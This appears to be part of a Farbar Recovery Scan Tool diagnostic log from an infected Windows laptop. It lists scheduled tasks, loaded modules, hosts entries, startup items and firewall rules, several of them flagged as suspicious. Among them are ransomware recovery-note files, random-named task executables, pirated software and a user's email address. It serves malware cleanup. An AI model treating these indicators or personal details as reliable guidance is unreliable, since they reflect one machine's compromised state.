ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext64.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers6-x32: [_MovaviSuite10] -> {9D700AB0-33CE-4ab3-BD66-3A73CC2CEDE3} => C:\Program File (x86) Movavi Video Editor Suite 12 - (Free Cracked Version)\Movavi Video Suite 12\vcContext\vcContext.dll [2013-12-11] (Movavi)
ContextMenuHandlers1_S-1-5-21-1066246007-1091995785-1061003623-1001: [SysMenuExt] -> {020B1D4B-5738-4C77-9E19-4F173DD9B486} => C:\Program Files\Common Files\System\SysMenu64.dll -> No File
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0871BC7F-DE9B-4C30-A460-54D7FCC6F3C7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-12] (Google Inc.)
Task: {0B68F930-F054-44FD-8480-C9B2E8CE6446} - System32\Tasks\AsusVibeSchedule => C:\Program Files (x86)\Asus\AsusVibe\AsusVibeLauncher.exe [2013-11-04] ()
Task: {13F4F7F9-754A-479C-95B7-2668E5195C53} - System32\Tasks\ASUS Live Update2 => C:\Program Files (x86) [Argument = -check]
Task: {2283DE1E-0461-4B5C-93B8-792D6C6384D6} - System32\Tasks\{31DDBD37-5DB7-4030-8064-10B0CAA806C3} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2016-07-10] (COMODO)
Task: {2BD7BF5D-C4CF-4669-A2BC-FD410979401B} - System32\Tasks\ASUS Live Update1 => C:\Program Files (x86) [Argument = -critical]
Task: {39FEF968-A8FF-4F5C-9196-0E7AA2353384} - System32\Tasks\ASUS Smart Gesture Launcher => C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLauncher.exe [2014-03-31] (AsusTek)
Task: {4C290D38-8E4F-4E0C-8A57-748C6445EFF3} - System32\Tasks\ASUS Splendid ColorU => C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe [2013-10-07] (ASUSTeK Computer Inc.)
Task: {4D574819-623E-459C-ADAA-ABE4DA8328F0} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2014-03-20] (Realtek Semiconductor)
Task: {547698E5-4F4A-441A-BB7D-0BCEAA6F0593} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-12] (Google Inc.)
Task: {59E33C91-940C-4B1B-8875-D56CF8C1F9EA} - System32\Tasks\PinItAutoUpdate => C:\Program Files (x86)\Pinterest\Pin It\AutoUpdater.exe [2013-10-17] ()
Task: {5AA3BDDC-F135-471F-BAFD-C4667F07FEC5} - System32\Tasks\{D3CF4331-7A31-4F84-BB21-69FA5F743E7A} => C:\Windows\system32\pcalua.exe -a C:\Windows\986246e4d4365334c49f584d3435ca41.exe
Task: {73A5F5CB-0B75-4158-B3D5-60B79A55381B} - System32\Tasks\COMODO\COMODO Signature Update {B9D5C6F9-17D2-4917-8BD0-614BAA1C6A59} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-07-10] (COMODO)
Task: {7A810030-3719-44B1-86D4-C623F0136B7E} - System32\Tasks\COMODO\COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2016-07-10] (COMODO)
Task: {885E1D98-007F-4A6C-9B21-CB66F24620E1} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-02-12] (Piriform Ltd)
Task: {933A0EAA-67D1-40AD-8272-FE777ED5D1C2} - System32\Tasks\{C26243DB-2C37-44EE-9F28-CE2E8B7FC0E3} => C:\Program Files (x86)\pAuZbg.exe [1623-04-04] (Microsoft Corporation) <==== ATTENTION
Task: {97F7FC31-B27F-47F6-A95A-B187E18672B2} - System32\Tasks\{81D52804-7B29-49D2-80AA-07954E82952B} => C:\Program Files (x86)\YuIeaAuVrYQ.exe [1623-04-04] (Microsoft Corporation) <==== ATTENTION
Task: {985790D0-EF1D-4BF1-96BA-E15830E37E2E} - System32\Tasks\COMODO\COMODO Update {A6D52E4F-569B-4756-B3D8-DF217313DA85} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-07-10] (COMODO)
Task: {9C0EB61C-E232-4548-847B-0FBE48C483F2} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {9E90D4EA-24E8-466B-AEE7-2D93FD4EFF51} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate -nolegacy
Task: {9E90D4EA-24E8-466B-AEE7-2D93FD4EFF51} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(2): %windir%\system32\rundll32.exe -> appraiser.dll,DoScheduledTelemetryRun
Task: {B489F90E-C13F-4994-9853-8778C8E31344} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate
Task: {B489F90E-C13F-4994-9853-8778C8E31344} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(2): %windir%\system32\rundll32.exe -> invagent.dll,RunUpdate
Task: {B555837A-F36E-4453-A0C0-E1982D23AE8A} - System32\Tasks\ASUS Splendid ACMON => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [2013-10-07] (ASUS)
Task: {B68434B3-38F7-4E31-9788-A98D73098673} - System32\Tasks\{CF06CADB-185A-4E37-941E-EF8A74A640B8} => C:\Windows\system32\pcalua.exe -a "E:\Free Software Programs\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP\Chopper.exe" -d "E:\Free Software Programs\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP"
Task: {BCE45004-B0FC-4F7C-9E96-2E7DBD2AE33E} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-danbanic1@hotmail.com => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)
Task: {C0EA6C51-0D21-4C1C-9AD2-4B14A9002B63} - System32\Tasks\{7AABF775-AB66-4734-B6C6-CD26D49E39AF} => C:\Windows\system32\pcalua.exe -a "C:\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP\Chopper.exe" -d "C:\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP"
Task: {C2E59037-9F26-40BC-B416-8F2A7E22E244} - System32\Tasks\Update Checker => C:\Program Files (x86)\ASUS\ASUS Live Update\UpdateChecker.exe [2014-03-11] ()
Task: {EB9B2DA6-E063-4F2A-A690-9A70E1E8FBE9} - System32\Tasks\RtHDVBg => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2014-03-31] (Realtek Semiconductor)
Task: {F675F9DA-7832-44FC-B84F-99A0B7E15237} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated)
Task: {FBF83420-4969-4297-B1AF-91B1C6329E4F} - System32\Tasks\6320c4d4d9492959f6f8b43b8fdbf2f5 => sc start 6320c4d4d9492959f6f8b43b8fdbf2f5 <==== ATTENTION
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
 
Shortcut: C:\Users\Dan\Desktop\SoftTeddy 3D - run.bat - Shortcut.lnk -> C:\Program File (x86) SmoothTeddy 3D - Simple 3D Program\SmoothTeddy\run.bat ()
Shortcut: C:\Users\Dan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ShapeShop\ShapeShop3d.com.lnk -> hxxp://www.shapeshop3d.com
Shortcut: C:\Users\Dan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ShapeShop\Tutorial Videos At Vimeo.lnk -> hxxp://www.vimeo.com/shapesho
 
ShortcutWithArgument: C:\Users\Dan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\a06339e9776d4569\Instagram for Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> "
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-02-02 09:23 - 2011-02-28 18:37 - 000095008 _____ () C:\Windows\System32\Primomonnt.dll
2018-03-22 21:50 - 2018-03-22 21:50 - 000369872 _____ () C:\ProgramData\dahhService\dahhService.exe
2016-05-22 19:33 - 2016-05-22 19:33 - 000491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2017-08-11 19:17 - 2018-03-07 22:45 - 012021840 _____ () C:\Program Files\Gramblr\gramblr.exe
2018-03-22 19:26 - 2018-03-20 02:00 - 002683224 _____ () C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\swiftshader\libglesv2.dll
2018-03-22 19:26 - 2018-03-20 02:00 - 000127832 _____ () C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\swiftshader\libegl.dll
2016-05-22 19:32 - 2016-05-22 19:32 - 031680176 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
2014-02-24 06:59 - 2014-02-24 06:59 - 000109056 _____ () C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\ASUSWSHomeCloudAPI.dll
2018-03-22 21:52 - 2018-03-22 21:52 - 002150400 _____ () C:\Windows\9b2582d4a23748e2d93e755c9fbf7de5.dll
2013-09-09 21:23 - 2013-09-09 21:23 - 000162816 _____ () C:\Program Files (x86)\ASUS\Splendid\CCTAdjust.dll
2013-10-08 23:41 - 2013-10-08 23:41 - 000037968 _____ () C:\Program Files (x86)\ASUS\Splendid\DetectDisplayDC.dll
2015-06-24 15:28 - 2015-06-24 15:28 - 001301720 _____ () C:\Program Files (x86)\VMware\VMware Player\libxml2.dll
2016-08-24 08:45 - 2016-08-24 08:45 - 040523456 _____ () C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\CEF\libcef.dll
2016-06-08 00:10 - 2016-06-08 00:10 - 000118272 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\fs-ext\build\Release\fs-ext.node
2016-06-08 00:10 - 2016-06-08 00:10 - 000205824 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-vulcanjs\build\Release\VulcanJS.node
2016-06-08 00:10 - 2016-06-08 00:10 - 000117248 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ref\build\Release\binding.node
2016-06-08 00:10 - 2016-06-08 00:10 - 000125440 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ffi\build\Release\ffi_bindings.node
2016-08-24 08:24 - 2016-08-24 08:24 - 000098496 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-ProxyResolver\build\Release\ProxyResolverWin.dll
2016-06-08 00:10 - 2016-06-08 00:10 - 000166400 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\idle-gc\build\Release\idle-gc.node
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\Temp:862BDB1A [139]
AlternateDataStreams: C:\Users\Dan\Downloads\Anti-CryptorBitV2.zip:BDU [1]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSPrx => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSw8 => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ColorMedia => ""="service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\groovesquid.com -> hxxps://groovesquid.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\instagram.com -> hxxps://instagram.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\mediashuttle.com -> hxxps://media-shuttle-free-trial-portal.mediashuttle.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\mycloud.com -> hxxps://idp.mycloud.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\spotify.com -> hxxps://www.spotify.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\winamp.com -> hxxps://www.winamp.com
IE restricted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\doubleclick.net -> hxxps://doubleclick.net
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-08-22 09:25 - 2018-03-22 21:51 - 000001330 _____ C:\Windows\system32\Drivers\etc\hosts
 
127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 mydownloaddomain.com
127.0.0.1 linkmate.space
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 doctorlink.space
127.0.0.1 plugpackdownload.net
127.0.0.1 texttotalk.org
127.0.0.1 gambling577.xyz
127.0.0.1 htagdownload.space
127.0.0.1 mybcnmonetize.com
127.0.0.1 360devtraking.website
127.0.0.1 dscdn.pw
127.0.0.1 bcnmonetize.go2affise.com
127.0.0.1 beautifllink.xyz
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\asus\wallpapers\asus.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.html"
HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.png"
HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.txt"
HKLM\...\StartupApproved\Run32: => "YTDownloader"
HKLM\...\StartupApproved\Run32: => "avgnt"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKLM\...\StartupApproved\Run32: => "Dropbox"
HKLM\...\StartupApproved\Run32: => "APSDaemon"
HKLM\...\StartupApproved\Run32: => "QuickTime Task"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.html"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.png"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.txt"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.html"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.png"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.txt"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "ChocolateBar Sidebar"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "YTDownloader"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "xdm"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "CCleaner Monitoring"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{84E7D022-D859-4AAD-93A3-1E9E9F1C1E0D}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD10\PowerDVD10.EXE
FirewallRules: [{CEC34761-FBD2-4DD1-8310-5F8AAF53D82E}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nswB7A8.tmp\CnetInstaller-75409715.exe
FirewallRules: [{F5CAA7A9-D801-4982-AFF8-C7D20E365B8F}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nswB7A8.tmp\CnetInstaller-75409715.exe
FirewallRules: [{9AD6A247-DC93-49BD-8D91-890B72E639F4}] => (Allow) LPort=1886
FirewallRules: [{9EA4A53B-4ABC-431F-BAC0-C0EC0E42A3FE}] => (Allow) LPort=1886
FirewallRules: [{FEBB96C1-B31C-436C-A9CC-4ACDFDCEB1D1}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{3CE5225E-435B-4FE5-A84B-1C2A07EC44D6}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{7D2E9490-E89D-4031-927A-417C014ADFFC}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{55D48809-1F66-4497-9319-FE74A5051B36}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{E54BD4BD-3E8D-48F2-97B8-FFF46F726355}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{0FF7443B-3A64-41AE-B2A4-92DD6C564CDF}] => (Allow) C:\Users\Dan\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{5EF00627-14E5-43A4-B60F-A6A8995519C2}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{7A2FABE4-0106-4B09-A794-4F7019561123}] => (Allow) LPort=2869
FirewallRules: [{FC21E2C2-60FC-4224-9CD1-3C4CE101335A}] => (Allow) LPort=1900
FirewallRules: [{AB859042-2A95-4E72-A252-8A16F00E2698}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{07710B1F-203C-4B52-80E1-6E5A435B0B49}] => (Allow) C:\Program Files (x86)\Techgile\bin\Techgile.BRT.Helper.exe
FirewallRules: [{6E036BFF-833F-4CBD-99E0-702EBDE37553}] => (Allow) C:\Program Files (x86)\Techgile\bin\Techgile.BRT.Helper.exe
FirewallRules: [{CF59B7AE-9D77-40E1-B0FF-DD3E8617864B}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser\Winamp\winamp.exe
FirewallRules: [{A2503CB4-8DD7-4CC1-A35F-44508F1217D5}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser\Winamp\winamp.exe
FirewallRules: [{D6E98B02-4D68-4CC7-81C6-AF5504789A11}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jrmcp.exe
FirewallRules: [{E0012F5B-40C2-4C24-9F76-8D65BAE96E8D}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jrmcp.exe
FirewallRules: [{65BCBA58-B251-45D5-8F6F-4AFDD83D9EA3}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jbp.exe
FirewallRules: [{8A98D66E-7964-43B4-828C-2636B3B9C376}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jbp.exe
FirewallRules: [{C6709782-46D1-43D4-AA0D-221D650F01CE}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jwmpp.exe
FirewallRules: [{41D0374F-2166-47ED-9C01-347C96AD8EEA}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jwmpp.exe
FirewallRules: [{0D4021A7-68FA-4CAD-A92D-9B89BAB9D6D8}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\ffmpeg.exe
FirewallRules: [{61459AFB-F078-4819-83A0-32430B3DFE90}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\ffmpeg.exe
FirewallRules: [{FB331439-BAF3-421D-8363-0B7DBAF28328}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\aria2c.exe
FirewallRules: [{828F9004-D6AD-424B-B9AF-358E09E6D59D}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\aria2c.exe
FirewallRules: [{61951D9D-D9E8-4098-BBC4-DCE2C15E0A37}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\qtCopy.exe
FirewallRules: [{9D7ECD7E-4081-463D-A7A1-66901FB4631A}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\qtCopy.exe
FirewallRules: [TCP Query User{0D97D9AA-F1E5-482A-B3FF-B4CBC63122EE}C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [UDP Query User{4D865EC7-719F-465D-8376-EDE19BB17CB9}C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [TCP Query User{C62A3DCA-EF3A-4BFA-AD77-530BA8EB30A7}E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Block) E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [UDP Query User{6002DF46-D0C0-4D0D-A7CF-623A681197EA}E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Block) E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [TCP Query User{BB8345BC-ECD7-4471-B25A-9D853E961F5A}C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [UDP Query User{7FC4D6EF-81C4-458F-9B40-AD7B400A1E4C}C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [TCP Query User{BC5A050A-5C0E-454E-A679-0B6F74B6AEEB}E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [UDP Query User{06AE2A0A-79C9-42E3-8D44-832B7E14FA66}E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [{C1CDE395-B54A-41F5-8253-D1C74388EEBD}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe
FirewallRules: [{4C545804-7C07-4B6F-B73F-E447437D340D}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe
FirewallRules: [TCP Query User{F025769D-FD8B-45D2-A905-50841DDDB59B}C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe] => (Allow) C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe
FirewallRules: [UDP Query User{B22891B0-0B73-4385-81F5-B178F881D091}C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe] => (Allow) C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe
FirewallRules: [{A879E9E7-D547-4AB8-9183-31F47DA82E93}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsb7AC7.tmp\CnetInstaller-75409715.exe
FirewallRules: [{5452DD3B-F6A9-4B86-856D-2147672734F5}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsb7AC7.tmp\CnetInstaller-75409715.exe
FirewallRules: [{2029387B-0B9A-48C5-8D70-D9624A75818D}] => (Allow) C:\Program File (x86) Free Video To MP3 Converter DVDVideoSoft Three UpDate\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{23995299-1FD2-4CFE-B8AF-2086099394E8}] => (Allow) C:\Program File (x86) Free Video To MP3 Converter DVDVideoSoft Three UpDate\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{0DD782B8-3E36-4357-B248-4A58956BA95E}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsm3630.tmp\CnetInstaller-10444774.exe
FirewallRules: [{3435D53E-9FD6-4668-BF9A-6D30B08E5FEE}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsm3630.tmp\CnetInstaller-10444774.exe
FirewallRules: [{FF5E24B4-1562-4D0E-B0F0-B909F14E18B7}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsqF114.tmp\CnetInstaller-10444774.exe
FirewallRules: [{FBB98ABC-9569-4C9B-ACD7-72394C22E85A}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsqF114.tmp\CnetInstaller-10444774.exe
FirewallRules: [{7D2A9822-B4AC-4027-8630-BBA86B2B3250}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsnD7EB.tmp\CnetInstaller-75449917.exe
FirewallRules: [{B61AADD3-2D37-49CE-8846-3DBE50FB4B8A}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsnD7EB.tmp\CnetInstaller-75449917.exe
FirewallRules: [{2DA2B986-7667-4D2C-9E85-C2F81B954DE6}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsw2542.tmp\CnetInstaller-10875190.exe
FirewallRules: [{2FE73EE5-6FB3-4DC8-9CFF-B1AD59033BDD}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsw2542.tmp\CnetInstaller-10875190.exe
FirewallRules: [TCP Query User{5AC03A41-337A-4D35-8475-DBF7FCF3718C}C:\program file (x86) vlc media player videolan\vlc\vlc.exe] => (Block) C:\program file (x86) vlc media player videolan\vlc\vlc.exe
FirewallRules: [UDP Query User{3A9F9831-57E1-4FDB-984D-672AA8256557}C:\program file (x86) vlc media player videolan\vlc\vlc.exe] => (Block) C:\program file (x86) vlc media player videolan\vlc\vlc.exe
FirewallRules: [{57579DAD-B0A7-4600-BACB-ACFBD0BF582E}] => (Allow) C:\Program File (x86) 4kYoutubetomp3TWO\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{20046B7C-7FC0-4DAC-81CD-B157DC013E33}] => (Allow) C:\Program File (x86) 4kYoutubetomp3TWO\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [TCP Query User{210A33E9-6B2B-44CF-BCF6-D34BC763A901}C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [UDP Query User{BC1DE14B-4640-475C-A83B-879941C715F5}C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [{207663F4-14AA-4B8C-8B75-0E34AECA606F}] => (Block) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [{5F89233A-ABDC-4FF1-9263-2D96AFE62121}] => (Block) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [TCP Query User{803AE086-7E6A-48E0-8802-785AA4FC4A01}C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe] => (Allow) C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe
